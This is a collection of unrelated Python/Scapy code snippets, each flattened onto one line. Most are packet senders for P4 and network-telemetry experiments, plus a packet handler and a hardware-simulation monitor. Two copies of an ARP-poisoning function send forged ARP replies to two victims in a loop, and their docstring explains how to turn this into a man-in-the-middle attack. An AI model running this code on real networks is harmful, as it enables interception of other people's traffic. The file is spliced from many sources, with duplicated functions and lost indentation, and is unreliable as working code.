def packet_send(address, iface, payload): pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') #pkt = pkt /IP(dst=addr) / TCP(dport=1234, sport=random.randint(49152,65535)) / sys.argv[2] pkt = pkt / IP(dst=address) / TCP(dport=1234, sport=27777) / payload pkt.show2() for i in range(1000): sendp(pkt, iface=iface, verbose=False)
def send_ack(pkt): iface = get_if() ack = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") ack = ack / IP(dst=pkt[IP].src, proto=17) / UDP(dport=4322, sport=1235) / MRI(count=pkt[MRI].count, swtraces=pkt[MRI].swtraces) ack.show2() sendp(ack, iface=iface, verbose=False) print ("ACK sent")
def main(): if len(sys.argv) < 3: print 'pass 2 arguments: <destination> "<message>"' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() # pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP( # dst=addr, options = IPOption_MRI(count=2, # swtraces=[SwitchTrace(swid=0,qdepth=0), SwitchTrace(swid=1,qdepth=0)])) / UDP( # dport=4321, sport=1234) / sys.argv[2] # pkt.show2() #hexdump(pkt) try: for i in range(int(sys.argv[3])): current_time = str(int(float(time()) * 1000000)) pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP(dst=addr) / UDP( dport=4321, sport=1234) / current_time pkt.show2() sendp(pkt, iface=iface) sleep(0.1) except KeyboardInterrupt: raise
def main(): if len(sys.argv) < 3: print('pass 2 arguments: <destination> "<message>"') exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() print("iface = ", iface) inter_arrival_time = 0.1 lamb = 1 / inter_arrival_time print("sending on interface %s to %s" % (iface, str(addr))) total_pkts = 0 random_ports = random.sample(xrange(1024, 65535), 10) for port in random_ports: num_packets = random.randint(50, 250) for i in range(num_packets): #data = randomword(100) pkt = Ether(src=get_if_hwaddr(iface), dst='00:00:00:00:01:01') #pkt = pkt /IP(dst=addr) / UDP() / sys.argv[2] #pkt = pkt /IP(dst=addr) / TCP(dport=port, sport=random.randint(49152,65535)) / sys.argv[2] pkt = pkt / IP(dst=addr) / UDP( dport=port, sport=random.randint(49152, 65535)) / sys.argv[2] time.sleep(random.expovariate(lamb)) pkt.show2() #sendp(pkt, iface=iface, verbose=False) sendp(pkt, iface=iface, verbose=False) total_pkts += 1 #pkt = Ether(src=get_if_hwaddr(iface), dst='00:00:00:00:01:01') #pkt = pkt /IP(dst=addr) / UDP(dport=3456, sport=49152) / sys.argv[2] #pkt.show2() #sendp(pkt, iface=iface, verbose=False) print("Sent %s packets in total" % total_pkts)
def main(): parser = argparse.ArgumentParser() parser.add_argument("--p", help="Protocol name To send TCP/UDP etc packets", type=str) parser.add_argument("--des", help="IP address of the destination", type=str) parser.add_argument("--m", help="Raw Message", type=str) parser.add_argument("--dur", help="in seconds", type=str) args = parser.parse_args() if args.p and args.des and args.m and args.dur: addr = socket.gethostbyname(args.des) iface = get_if() if args.p == 'UDP': pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP(dst=addr, tos=1) / UDP(dport=4321, sport=1234) / args.m pkt.show2() try: for i in range(int(args.dur)): sendp(pkt, iface=iface) sleep(1) except KeyboardInterrupt: raise elif args.p == 'TCP': pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP(dst=addr, tos=1) / TCP() / args.m pkt.show2() try: for i in range(int(args.dur)): sendp(pkt, iface=iface) sleep(1) except KeyboardInterrupt: raise
def main(): if len(sys.argv) != 3 and len(sys.argv) != 7: print 'pass 2 arguments: <destination> "<message> <inst_0> <inst_1> <inst_2> <inst_3>"' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() print "sending on interface %s to %s" % (iface, str(addr)) pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') pkt = pkt / IP(dst=addr) / TCP(dport=1234, sport=random.randint(49152, 65535)) if len(sys.argv) == 7: pkt = pkt / IntIndicator(INT_set=1) / shim_header() / int_header( ins_cnt=int(sys.argv[3]) + int(sys.argv[4]) + int(sys.argv[5]) + int(sys.argv[6]), inst_0=int(sys.argv[3]), inst_1=int(sys.argv[4]), inst_2=int(sys.argv[5]), inst_3=int(sys.argv[6])) / sys.argv[2] else: pkt = pkt / IntIndicator() / shim_header() / int_header() / sys.argv[2] pkt.show2() print "len(pkt) = ", len(pkt) sendp(pkt, iface=iface, verbose=False)
def main(): if len(sys.argv)<2: print 'pass 2 arguments: <source> <destination>' exit(1) src_addr = socket.gethostbyname(sys.argv[1]) addr = socket.gethostbyname(sys.argv[2]) iface = get_if() pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP( src=src_addr, dst=addr, proto=63, options = IPOption_QUERY(count=10, flow_proto=6)) # pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP( # dst=addr, options = IPOption_MRI(count=2, # swtraces=[SwitchTrace(swid=0,qdepth=0), SwitchTrace(swid=1,qdepth=0)])) / UDP( # dport=4321, sport=1234) / sys.argv[2] pkt.show2() #hexdump(pkt) # try: # for i in range(int(sys.argv[4])): # sendp(pkt, iface=iface) # sleep(1) # except KeyboardInterrupt: # raise try: sendp(pkt, iface=iface) except KeyboardInterrupt: raise
def main(): while True: strn = str( raw_input( 'Enter a number to send to host. Type \'quit\' to quit>:')) first_packet = str(raw_input('Is this the first packet? y/n >:')) last_packet = str(raw_input('Is this the last packet? y/n >:')) if strn is "quit": break addr = socket.gethostbyname(sys.argv[1]) iface = get_if() print "sending on interface %s to %s" % (iface, str(addr)) pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') #pkt = pkt /IP(dst=addr) / TCP(dport=1234, sport=random.randint(49152,65535)) / strn if first_packet is "y": pkt = pkt / IP(dst=addr) / P4inc(data=int(strn), result=0) elif last_packet is "y": pkt = pkt / IP(dst=addr) / P4inc(bos=0x01, data=int(strn)) else: pkt = pkt / IP(dst=addr) / P4inc(data=int(strn)) pkt.show2() sendp(pkt, iface=iface, verbose=False) print("packet sent...")
def build_packet(args, parser): src = args.src.split(':') dst = args.dst.split(':') # create the payload base = "Hello from Python" header_len = 14 + 20 + 8 data = base * ((args.length - header_len) / len(base) + 1) data = data[0:args.length - header_len] scap = Ether(src=args.srcmac, dst=args.dstmac) scap = scap / IP(src=src[0], dst=dst[0]) scap = scap / UDP(sport=int(src[1]), dport=int(dst[1])) scap = scap / data try: # checksum is computed when calling str(scap), e.g. when the packet is # assembled ret = str(scap) except: print("Packet parameters are invalid\n") help_quit(parser) if args.dump: scap.show2() return ret
def main(): if len(sys.argv) < 3: print('pass 2 arguments: <destination> "<message>"') exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = 'eth0' pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP( ihl=0, dst=addr, options=IPOption_INT(count=0, int_headers=[])) / UDP( dport=1234, sport=4321) / sys.argv[2] # pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP( # dst=addr, options = IPOption_MRI(count=2, # swtraces=[SwitchTrace(swid=0,qdepth=0), SwitchTrace(swid=1,qdepth=0)])) / UDP( # dport=4321, sport=1234) / sys.argv[2] pkt.show2() #hexdump(pkt) try: for i in range(int(sys.argv[3])): sendp(pkt, iface=iface) sleep(0) except KeyboardInterrupt: raise
def main(): if len(sys.argv) < 3: print 'pass 2 arguments: <destination> "<message>"' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = "eth0" src_port = random.randrange(1024, 30000) dst_port = random.randrange(1024, 30000) payload = os.urandom(1000) pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP( dst=addr, options=IPOption_SI(count=0, swtraces=[])) / UDP( dport=random.randrange(1024, 30000), sport=random.randrange(1024, 30000)) / payload pkt.show2() try: for i in range(int(sys.argv[2])): pkts = [] for j in range(int(100)): pkts.append(pkt) sendp(pkts, iface=iface) sleep(1) except KeyboardInterrupt: raise
def main(): if len(sys.argv) < 3: print 'pass 3 arguments: <destination> <num>' exit(1) addr = socket.gethostbyname(sys.argv[1]) num = int(sys.argv[2]) iface = get_if() print "sending on interface %s to %s" % (iface, str(addr)) while num > 0: num = num - 1 s = "2 2 1" i = 0 pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') for p in s.split(" "): try: pkt = pkt / SourceRoute(bos=0, port=int(p)) i = i + 1 except ValueError: pass if pkt.haslayer(SourceRoute): pkt.getlayer(SourceRoute, i).bos = 1 pkt = pkt / IP( dst=addr, options=IPOption_MRI( count=0, pathid=1, swtraces=[])) / UDP(dport=4321, sport=1234) pkt.show2() sendp(pkt, iface=iface, verbose=False)
def build_packet(args, parser): src = args.src.split(':') dst = args.dst.split(':') # create the payload base = "Hello from Python" header_len = 14 + 20 + 8 data = base * ((args.length-header_len)/len(base) + 1) data = data[0:args.length-header_len] scap = Ether(src = args.srcmac, dst = args.dstmac) scap = scap / IP(src = src[0], dst = dst[0]) scap = scap / UDP(sport = int(src[1]), dport = int(dst[1])) scap = scap / data try: # checksum is computed when calling str(scap), e.g. when the packet is # assembled ret = str(scap) except: print("Packet parameters are invalid\n") help_quit(parser) if args.dump: scap.show2() return ret
def main(): if len(sys.argv) < 4: print 'pass 2 arguments: <destination> "<message>" <packetType> <#packets>' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() print "Sending %s packets" % (sys.argv[3]) if sys.argv[3] == "tcp": pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP( dst=addr, options=IPOption_MRI(count=0, swtraces=[])) / TCP( dport=4321, sport=1234) / sys.argv[2] elif sys.argv[3] == "udp": pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP( dst=addr, options=IPOption_MRI(count=0, swtraces=[])) / UDP( dport=4321, sport=1234) / sys.argv[2] else: print "Unrecognized packet" pkt.show2() try: for i in range(int(sys.argv[4])): sendp(pkt, iface=iface) sleep(1) except KeyboardInterrupt: raise
def main(): iface = get_if() print "sending on interface %s" % iface pkt = Ether(src=get_if_hwaddr(iface), dst='00:04:00:00:02:01') pkt = pkt /IP(dst="10.0.2.101", tos=0x0c) pkt.show2() sendp(pkt, iface=iface, verbose=False)
def main(): iface = "eth1" print "sending on interface %s" % (iface) pkt = Ether(src='00:15:4d:00:00:00', dst='00:15:4d:00:00:03') pkt = pkt / IPv6(dst="fc00::4" , src="fc00::1") #/ UDP() #/ sys.argv[1] pkt.show2() sendp(pkt, iface=iface, verbose=False)
def main(): addr = socket.gethostbyname(sys.argv[1]) iface = get_if() pkt = Ether(dst='08:00:00:00:01:22', type=0x800) / IP( dst=addr, proto=143) / Agri(id=0x1234, pH=0x3f8, temp=0x3f8) pkt.show2() sendp(pkt, iface=iface, verbose=False)
def send_pkt(iface, dst_ip_addr, message): addr = socket.gethostbyname(dst_ip_addr) print "sending on interface {} to IP addr {}".format(iface, str(addr)) pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') pkt = pkt / IP(dst=addr) / TCP( dport=1234, sport=random.randint(49152, 65535)) / message pkt.show2() sendp(pkt, iface=iface, verbose=False)
def main(): parser = argparse.ArgumentParser(description="Scapy sender program template") parser.add_argument('-v', type=int, help="Specify using (4)IPv4/(6)IPv6.", default=4) parser.add_argument('--intf', type=str, help="Specify interface.", default="eth0") parser.add_argument('--dip', type=str, help="The destination IP address.", default="255.255.255.255") parser.add_argument('--l4', type=str, help="Specify using TCP or UDP.", default="tcp") # parser.add_argument('--loop', type=int, help="Number of loop.", default=0) # parser.add_argument('--msg', type=str, help="The message which will send to dst.",default="Hello World") parser.add_argument('--dport', type=int, help="TCP/UDP destination port.", default=1234) parser.add_argument('--sport', type=int, help="TCP/UDP source port.", default=random.randint(49152,65535)) # parse args = parser.parse_args() # parser.print_help() # get value from args ipv = args.v addr = socket.gethostbyname(args.dip) iface = args.intf #get_if() dip = args.dip l4flag = args.l4 dport = args.dport sport = args.sport # print all print("IP version: IPv", ipv) print("Destination IP address: ", dip) print("Interface: ", iface) print("Layer 4: ", l4flag) print("Desintation Port number: ", dport) print("Source Port number: ", sport) # start to pack if ipv is 4: print "sending on interface {} to IP addr {}".format(iface, str(addr)) # for x in range(0, args.loop): pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') if l4flag is 'tcp': pkt = pkt / IP(dst=addr) / TCP(dport=dport, sport=sport) / "Scapy Template" else: pkt = pkt / IP(dst=addr) / UDP(dport=dport, sport=sport) / "Scapy Template" # show pkt.show2() # send sendp(pkt, iface=iface, verbose=True) # sleep time.sleep(1) elif ipv is 6: print "sending on interface {} to IPv6 addr {}".format(iface, str(addr)) #for x in range(0, args.loop): pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') pkt = pkt / IPv6(dst=addr) / TCP(dport=dport, sport=sport) / "Scapy Template" # show pkt.show2() # send sendp(pkt, iface=iface, verbose=False)
def cmd_arp_poison(victim1, victim2, iface, verbose): """Send ARP 'is-at' packets to each victim, poisoning their ARP tables for send the traffic to your system. Note: If you want a full working Man In The Middle attack, you need to enable the packet forwarding on your operating system to act like a router. You can do that using: # echo 1 > /proc/sys/net/ipv4/ip_forward Example: \b # habu.arpoison 192.168.0.1 192.168.0.77 Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77 Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70 Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77 ... """ conf.verb = False if iface: iface = search_iface(iface) if iface: conf.iface = iface['name'] else: logging.error( 'Interface {} not found. Use habu.interfaces to show valid network interfaces' .format(iface)) return False mac1 = getmacbyip(victim1) mac2 = getmacbyip(victim2) pkt1 = Ether(dst=mac1) / ARP( op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1) pkt2 = Ether(dst=mac2) / ARP( op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2) try: while 1: sendp(pkt1) sendp(pkt2) if verbose: pkt1.show2() pkt2.show2() else: print(pkt1.summary()) print(pkt2.summary()) time.sleep(1) except KeyboardInterrupt: pass
def main(): iface = get_if() #addr = socket.gethostbyname(sys.argv[1]) print "sending on interface %s to s1" % (iface) pkt = Ether(dst='00:01:00:00:00:00', type=0x1234) pkt = pkt / SendProbe(ts=long(get_ts()*1000000)) pkt.show2() sendp(pkt, iface=iface, verbose=False)
def main(): iface = get_if() pkt = Ether(src=get_if_hwaddr(iface), dst='00:00:00:02:02:02', type=1792) pkt = pkt / '\x00\x04' / '\x00\x03' pkt = pkt / '\x07\x01' / '\x00\x00' for i in xrange(5): sendp(pkt, iface=iface, verbose=False) pkt.show2() time.sleep(1)
def handle_pkt(pkt): #if UDP in pkt and pkt[UDP].dport == 2152: #if UDP in pkt: print "got a packet" pkt.show2() #hexdump(pkt) print "===================================ENVIANDO PACOTE ALTERADO=============================" #new implementation time.sleep(5) if pkt.segleft >= 0: new = Ether(src=pkt[Ether].dst, dst=pkt[Ether].src) extension = IPv6ExtHdrRouting() extension.segleft = pkt.segleft - 1 extension.addresses = pkt.addresses if extension.segleft == 1: new = new / IPv6( dst=extension.addresses[1], src="2001:0DB8:AC10:FE01:0000:0000:0000:0003" ) / extension / UDP( sport=64515, dport=2152) / GTP_U_Header(TEID=32) / IPv6( dst="2001:0DB8:AC10:FE01:0000:0000:0000:0001", src="2001:0DB8:AC10:FE01:0000:0000:0000:0006") / "host3" if extension.segleft == 0: new = new / IPv6( dst=extension.addresses[0], src="2001:0DB8:AC10:FE01:0000:0000:0000:0003" ) / extension / UDP( sport=64515, dport=2152) / GTP_U_Header(TEID=32) / IPv6( dst="2001:0DB8:AC10:FE01:0000:0000:0000:0001", src="2001:0DB8:AC10:FE01:0000:0000:0000:0006") / "host3" new.show2() sendp(new, loop=0, count=1) #end of new implementation #old implementation #time.sleep(5) #pkt2 = pkt #temp = pkt[Ether].src #pkt2[Ether].src = pkt2[Ether].dst #pkt2[Ether].dst = temp #pkt2.segleft = pkt2.segleft - 1 #if pkt2.segleft == 1: # pkt2[IPv6].dst = pkt2.addresses[1]; #if pkt2.segleft == 0: # pkt2[IPv6].dst = pkt2.addresses[0]; #pkt2[Raw] = (b"host3") #pkt2.show2() #sendp(pkt2, loop=0, count=1) #sr1(sendp(pkt2, loop=1, verbose = False)) ja estava comentado main()
def main(): if len(sys.argv)<3: print 'pass 2 arguments: <destination> "<message>"' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() print "sending on interface %s to %s" % (iface, str(addr)) pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') / IP(dst=addr) / UDP(dport=4321, sport=1234) / sys.argv[2] pkt.show2() sendp(pkt, iface=iface, verbose=False)
def cmd_arp_poison(victim1, victim2, iface, verbose): """Send ARP 'is-at' packets to each victim, poisoning their ARP tables for send the traffic to your system. Note: If you want a full working Man In The Middle attack, you need to enable the packet forwarding on your operating system to act like a router. You can do that using: # echo 1 > /proc/sys/net/ipv4/ip_forward Example: \b # habu.arpoison 192.168.0.1 192.168.0.77 Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77 Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70 Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77 ... """ conf.verb = False if iface: conf.iface = iface mac1 = getmacbyip(victim1) mac2 = getmacbyip(victim2) pkt1 = Ether(dst=mac1)/ARP(op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1) pkt2 = Ether(dst=mac2)/ARP(op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2) try: while 1: sendp(pkt1) sendp(pkt2) if verbose: pkt1.show2() pkt2.show2() else: print(pkt1.summary()) print(pkt2.summary()) time.sleep(1) except KeyboardInterrupt: pass
def _monitor_recv(self): clk = RisingEdge(self.clock) self._pkt = "" while True: yield clk ctrl, bytes = self._get_bytes() if ctrl[0] and bytes[0] == _XGMII_START: ctrl, bytes = ctrl[1:], bytes[1:] while self._add_payload(ctrl, bytes): yield clk ctrl, bytes = self._get_bytes() if self._pkt: self.log.debug("Received:\n%s" % (hexdump(self._pkt))) if len(self._pkt) < 64 + 7: self.log.error("Received a runt frame!") if len(self._pkt) < 12: self.log.error("No data to extract") self._pkt = "" continue preamble_sfd = self._pkt[0:7] crc32 = self._pkt[-4:] payload = self._pkt[7:-4] if preamble_sfd != _PREAMBLE_SFD: self.log.error("Got a frame with unknown preamble/SFD") self.log.error(hexdump(preamble_sfd)) self._pkt = "" continue expected_crc = struct.pack("<I", (zlib.crc32(payload) & 0xFFFFFFFF)) if crc32 != expected_crc: self.log.error("Incorrect CRC on received packet") self.log.info("Expected: %s" % (hexdump(expected_crc))) self.log.info("Received: %s" % (hexdump(crc32))) # Use scapy to decode the packet if _have_scapy: p = Ether(payload) self.log.debug("Received decoded packet:\n%s" % p.show2()) else: p = payload self._recv(p) self._pkt = ""